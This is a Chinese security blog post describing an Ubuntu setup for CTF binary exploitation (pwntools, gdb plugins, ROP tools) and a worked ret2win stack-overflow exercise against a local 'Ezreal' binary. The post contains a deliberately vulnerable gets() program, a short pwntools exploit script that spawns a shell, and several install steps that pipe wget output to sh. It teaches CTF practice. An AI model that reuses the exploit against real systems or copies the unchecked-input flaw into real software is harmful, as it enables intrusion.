<!DOCTYPE html>
<html lang="zh-CN">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="oo3">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="oo3">
    
    <meta name="keywords" content="Q0mumu,qymua,QYMUA,oo3">
    
    <meta name="description" content="只是喜欢倒腾Sec/认真生活的热血boy | 阿森__">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>Ubuntu 16.04 for Pwn · QYMUA&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/favicon.ico" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
<meta name="generator" content="Hexo 4.2.0"></head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >QYMUA&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">Ubuntu 16.04 for Pwn</a>
            </div>
    </div>
    
    <a class="home-link" href=/>QYMUA's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            Ubuntu 16.04 for Pwn
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "linux">linux</a>
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "ubuntu">ubuntu</a>
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "pwn">pwn</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">1k</span>阅读时长: <span class="post-count reading-time">4 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2019/05/23</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <blockquote>
<p>往往我们做pwn题，都是拿到可执行文件(elf)其依赖文件libc.so,工欲善其事必先利其器，利用好的工具，可以事半功倍。在此列出自己做pwn题的虚拟机ubuntu配置，更加期待WSL2上线后，使用docker部署pwn环境做题</p>
</blockquote>
<p>主要工具：<br><code>vim</code> ： 安装插件，为后续编写exploit<br><code>peda</code> ：gdb插件，调试神器，谁用谁知道<br><code>pwngdb、gef</code> ：同上<br><code>pwndbg</code>：GitHub上的一个项目,用于GDB的辅助增强<br><code>pwntools</code>：常见的pwn漏洞堆溢出、栈溢出、use after free、格式化字符串、命令注入以及竞态(常见于多线程)等程序漏洞，在程序漏洞利用常利用python脚本来编写exploit<br>Capstone、Binutils…<br><code>rop工具</code> :ROPgadget、one_gadget，这两个都很好用，one_gadget主要是用来寻找libc文件中的一些shell地址的、ROPgadget则主要是用来构建rop链的，非常实用<br><code>LibcSearcher</code>:用来泄露libc库中函数的偏移的库</p>
<a id="more"></a>

<h2 id="配置"><a href="#配置" class="headerlink" title="配置"></a>配置</h2><h3 id="VIM"><a href="#VIM" class="headerlink" title="VIM"></a>VIM</h3><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget -qO- http<span class="variable">s:</span>//raw.github.<span class="keyword">com</span>/ma6174/<span class="keyword">vim</span>/master/setup.<span class="keyword">sh</span> | <span class="keyword">sh</span> -<span class="keyword">x</span></span><br></pre></td></tr></table></figure>
<p><a href="https://github.com/ma6174/vim" target="_blank" rel="noopener">详细配置地址</a></p>
<p><img src="https://raw.githubusercontent.com/Qymua/bookmaker-data/master/Qymua/1589218665028.png" alt=""></p>
<h3 id="安装Capstone（反编译框架）"><a href="#安装Capstone（反编译框架）" class="headerlink" title="安装Capstone（反编译框架）"></a>安装Capstone（反编译框架）</h3><figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">~<span class="symbol">$</span> git clone https:<span class="comment">//github.com/aquynh/capstone</span></span><br><span class="line">~<span class="symbol">$</span> cd capstone</span><br><span class="line">~<span class="symbol">$</span> make</span><br><span class="line">~<span class="symbol">$</span> sudo make install</span><br></pre></td></tr></table></figure>
<h3 id="安装Binutils（二进制工具集）"><a href="#安装Binutils（二进制工具集）" class="headerlink" title="安装Binutils（二进制工具集）"></a>安装Binutils（二进制工具集）</h3><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git clone http<span class="variable">s:</span>//github.<span class="keyword">com</span>/Gallopsled/pwntools-binutils</span><br><span class="line">sudo apt-<span class="built_in">get</span> install software-properties-common</span><br><span class="line">sudo apt-<span class="built_in">add</span>-repository <span class="keyword">pp</span><span class="variable">a:pwntools</span>/binutils</span><br><span class="line">sudo apt-<span class="built_in">get</span> <span class="keyword">update</span></span><br><span class="line">sudo apt-<span class="built_in">get</span> install binutils-arm-linux-gnu</span><br></pre></td></tr></table></figure>

<h3 id="第三方库"><a href="#第三方库" class="headerlink" title="第三方库"></a>第三方库</h3><p>在逆向和溢出程序交互时，用得最多的几个第三方库先装好：</p>
<figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sudo pip <span class="keyword">install</span> pwntools</span><br><span class="line">sudo pip <span class="keyword">install</span> zio</span><br><span class="line">sudo pip <span class="keyword">install</span> pwn</span><br></pre></td></tr></table></figure>
<p>在配置python-pip的过程中遇到了点问题<br>升级pip==19.1.1后，出现如下报错：<br><img src="https://raw.githubusercontent.com/Qymua/bookmaker-data/master/Qymua/1589218665025.png" alt=""></p>
<p>可行的解决方案是修改报错行的代码</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pip._internal <span class="keyword">import</span> main</span><br></pre></td></tr></table></figure>
<p>ssl验证问题</p>
<figure class="highlight crystal"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">　rm -rf /usr/<span class="class"><span class="keyword">lib</span>/<span class="title">python2</span>.7/<span class="title">dist</span>-<span class="title">packages</span>/<span class="title">OpenSSL</span></span></span><br><span class="line">　rm -rf /usr/<span class="class"><span class="keyword">lib</span>/<span class="title">python2</span>.7/<span class="title">dist</span>-<span class="title">packages</span>/<span class="title">pyOpenSSL</span>-0.15.1.<span class="title">egg</span>-<span class="title">info</span></span></span><br><span class="line">　sudo pip install pyopenssl</span><br></pre></td></tr></table></figure>
<p>出现checksec无法使用的问题</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pip3 install git+http<span class="variable">s:</span>//github.<span class="keyword">com</span>/arthaud/<span class="keyword">python3</span>-pwntools.git</span><br></pre></td></tr></table></figure>

<h3 id="安装gdb工具"><a href="#安装gdb工具" class="headerlink" title="安装gdb工具"></a>安装gdb工具</h3><p>在调试时有时候需要不同功能，在gdb下需要安装两个工具pwndbg和peda，可惜这两个不兼容</p>
<p>pwndbg在调试堆的数据结构时候很方便</p>
<p>peda在查找字符串等功能时方便</p>
<h4 id="peda"><a href="#peda" class="headerlink" title="peda"></a>peda</h4><figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git clone https:<span class="string">//github.com/longld/peda.git</span> ~<span class="string">/peda</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"source ~/peda/peda.py"</span> &gt;&gt; ~<span class="string">/.gdbinit</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"DONE! debug your program with gdb and enjoy"</span></span><br></pre></td></tr></table></figure>
<h4 id="pwndbg"><a href="#pwndbg" class="headerlink" title="pwndbg"></a>pwndbg</h4><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git clone http<span class="variable">s:</span>//github.<span class="keyword">com</span>/pwndbg/pwndbg</span><br><span class="line"><span class="keyword">cd</span> pwndbg</span><br><span class="line">./setup.<span class="keyword">sh</span></span><br></pre></td></tr></table></figure>
<h4 id="pwngdb"><a href="#pwngdb" class="headerlink" title="pwngdb"></a>pwngdb</h4><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">cd</span> ~/</span><br><span class="line">git clone http<span class="variable">s:</span>//github.<span class="keyword">com</span>/scwuaptx/Pwngdb.git </span><br><span class="line"><span class="keyword">cp</span> ~/Pwngdb/.gdbinit ~/</span><br></pre></td></tr></table></figure>
<h4 id="gef"><a href="#gef" class="headerlink" title="gef"></a>gef</h4><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-id">#via</span> the install script</span><br><span class="line">$ wget -<span class="selector-tag">q</span> -O- https:<span class="comment">//github.com/hugsy/gef/raw/master/scripts/gef.sh | sh</span></span><br><span class="line">#manually</span><br><span class="line">$ wget -O ~/<span class="selector-class">.gdbinit-gef</span><span class="selector-class">.py</span> -<span class="selector-tag">q</span> https:<span class="comment">//github.com/hugsy/gef/raw/master/gef.py</span></span><br><span class="line">$ echo source ~/<span class="selector-class">.gdbinit-gef</span><span class="selector-class">.py</span> &gt;&gt; ~/.gdbinit</span><br></pre></td></tr></table></figure>

<p>我们通过修改<code>gdbinit</code>来切换想使用的插件<br><img src="https://raw.githubusercontent.com/Qymua/bookmaker-data/master/Qymua/1589218665024.png" alt=""></p>
<h3 id="ROPgadget"><a href="#ROPgadget" class="headerlink" title="ROPgadget"></a>ROPgadget</h3><p><a href="https://github.com/JonathanSalwan/ROPgadget" target="_blank" rel="noopener">https://github.com/JonathanSalwan/ROPgadget</a></p>
<h3 id="one-gadget"><a href="#one-gadget" class="headerlink" title="one_gadget"></a>one_gadget</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">apt-get <span class="keyword">install</span> ruby</span><br><span class="line">apt-<span class="keyword">get</span> <span class="keyword">install</span> gem</span><br><span class="line">sudo gem <span class="keyword">install</span> one_gadget</span><br></pre></td></tr></table></figure>
<h3 id="LibcSearcher"><a href="#LibcSearcher" class="headerlink" title="LibcSearcher"></a>LibcSearcher</h3><figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git clone http<span class="variable">s:</span>//github.<span class="keyword">com</span>/lieanu/libc.git</span><br><span class="line"><span class="keyword">cd</span> libc</span><br><span class="line">git submodule <span class="keyword">update</span> --init --recursive</span><br><span class="line">sudo <span class="keyword">python</span> setup.<span class="keyword">py</span> develop</span><br></pre></td></tr></table></figure>
<h2 id="实例-Pwn分析之栈溢出"><a href="#实例-Pwn分析之栈溢出" class="headerlink" title="实例:Pwn分析之栈溢出"></a>实例:Pwn分析之栈溢出</h2><p><img src="https://raw.githubusercontent.com/Qymua/bookmaker-data/master/Qymua/1589218665023.png" alt="解题思路"></p>
<h2 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h2><h3 id="0X01"><a href="#0X01" class="headerlink" title="0X01"></a>0X01</h3><p>反编译得到C伪代码</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  vulnerable();</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>main函数调用vulnerable()函数</p>
<p>vulnerable()函数逆向结果</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">vulnerable</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [esp+4h] [ebp-14h]</span></span><br><span class="line"></span><br><span class="line">  gets(&amp;s);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(&amp;s);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>vulnerable()函数中调用了gets()和puts()函数，而程序的逻辑只运行main函数和vulnerable函数</p>
<p><img src="https://raw.githubusercontent.com/Qymua/bookmaker-data/master/Qymua/1589218665026.png" alt="所有函数"></p>
<p>vulnerable函数功能：输入字符串，输出字符串<br>程序中主要函数有<br>内置函数：<code>gets</code>、<code>puts</code>、<code>system</code><br>自定义函数：<code>main</code>、<code>success</code></p>
<h3 id="0X02"><a href="#0X02" class="headerlink" title="0X02"></a>0X02</h3><p>通过C伪代码最终得到的C代码如下：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">success</span><span class="params">()</span> </span>&#123; </span><br><span class="line">   <span class="built_in">puts</span>(<span class="string">"You Hava already controlled it."</span>);</span><br><span class="line">   system(<span class="string">"/bin/sh"</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">vulnerable</span><span class="params">()</span> </span>&#123;</span><br><span class="line"> <span class="keyword">char</span> s[<span class="number">12</span>];</span><br><span class="line"> gets(s);</span><br><span class="line"> <span class="built_in">puts</span>(s);</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> **argv)</span> </span>&#123;</span><br><span class="line"> vulnerable();</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>gets() 是一个危险函数，因为它不检查输入字符串的长度，而是以回车来判断是否输入结束，所以很容易导致栈溢出</p>
<h3 id="0X03"><a href="#0X03" class="headerlink" title="0X03"></a>0X03</h3><p>查看程序的保护机制：</p>
<p><img src="https://raw.githubusercontent.com/Qymua/bookmaker-data/master/Qymua/1589218664991.png" alt="check"></p>
<p>输入s的值溢出到返回地址，将返回地址替换成success函数的起始地址</p>
<p><img src="https://raw.githubusercontent.com/Qymua/bookmaker-data/master/Qymua/1589218665027.png" alt=""></p>
<p>EBP与EBP的距离14H，而栈中的EBP占栈内存4H，所以要覆盖到放回地址需要18H</p>
<p><img src="https://raw.githubusercontent.com/Qymua/bookmaker-data/master/Qymua/1589218665022.png" alt=""></p>
<p>编写脚本如下：</p>
<figure class="highlight isbl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">from</span> <span class="variable">pwn</span> <span class="variable">import</span> *</span><br><span class="line"><span class="variable">sh</span> = <span class="function"><span class="title">process</span>(<span class="string">'./Ezreal'</span>)</span></span><br><span class="line"><span class="variable">success_addr</span> = <span class="number">0</span><span class="variable">x080491A2</span></span><br><span class="line"></span><br><span class="line"><span class="variable">payload</span> = <span class="string">'a'</span> * <span class="number">0</span><span class="variable">x18</span> + <span class="function"><span class="title">p32</span>(<span class="variable">success_addr</span>)</span></span><br><span class="line"><span class="variable">print</span> <span class="function"><span class="title">p32</span>(<span class="variable">success_addr</span>)</span></span><br><span class="line"></span><br><span class="line"><span class="variable">sh</span>.sendline(<span class="variable">payload</span>)</span><br><span class="line"></span><br><span class="line"><span class="variable">sh</span>.interactive()</span><br></pre></td></tr></table></figure>
<p>利用脚本后的栈结构如下：</p>
<p><img src="https://raw.githubusercontent.com/Qymua/bookmaker-data/master/Qymua/1589218665029.png" alt=""></p>
<p>运行脚本，成功拿到shell：</p>
<p><img src="https://raw.githubusercontent.com/Qymua/bookmaker-data/master/Qymua/1589218665030.png" alt=""></p>

    </article>
    <!-- license  -->
    
        <!-- reward  -->
    <div style="text-align:center;margin:100px auto auto auto;"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">点击赞赏二维码:)您的支持将是我前进最大的动力！</font></font></div><br>
    <div style="text-align:center;">
    <a class="fancy-link" href="/intro/alipay.png" alt="" data-fancybox="group" data-caption=""><img style="width:27.5%;margin:auto 20px auto 10px;" src="/intro/alipay.png" alt=""></a>
    <a class="fancy-link" href="/intro/wechat.jpg" alt="" data-fancybox="group" data-caption=""><img style="width:30%;margin:auto 10px auto 20px;" src="/intro/wechat.jpg" alt=""></a>
    </div>
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2019/08/15/2018FJ%E5%B7%A5%E6%8E%A7%E6%94%BB%E9%98%B2%E5%A4%A7%E8%B5%9BWriteUp/" title= "2018FJ工控攻防大赛WriteUp">
                    <div class="nextTitle">2018FJ工控攻防大赛WriteUp</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2019/04/24/Git-for-github-%E4%BD%BF%E7%94%A8%E7%AC%94%E8%AE%B0/" title= "Git for github 使用笔记">
                    <div class="prevTitle">Git for github 使用笔记</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:qymuao3o@outlook.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/Qymua" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
    
        
    
        
    
        
            
                <a href="https://weibo.com/u/7281537566?is_hot=1" class="iconfont-archer weibo" target="_blank" title=weibo></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="https://space.bilibili.com/190787119" class="iconfont-archer bilibili" target="_blank" title=bilibili></a>
            
        
    
        
    
        
    
        
    
        
            
                <a href="https://qymua.com/atom.xml" class="iconfont-archer rss" target="_blank" title=rss></a>
            
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">Author <a href="https://qymua.com" target="_blank">QYMUA</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
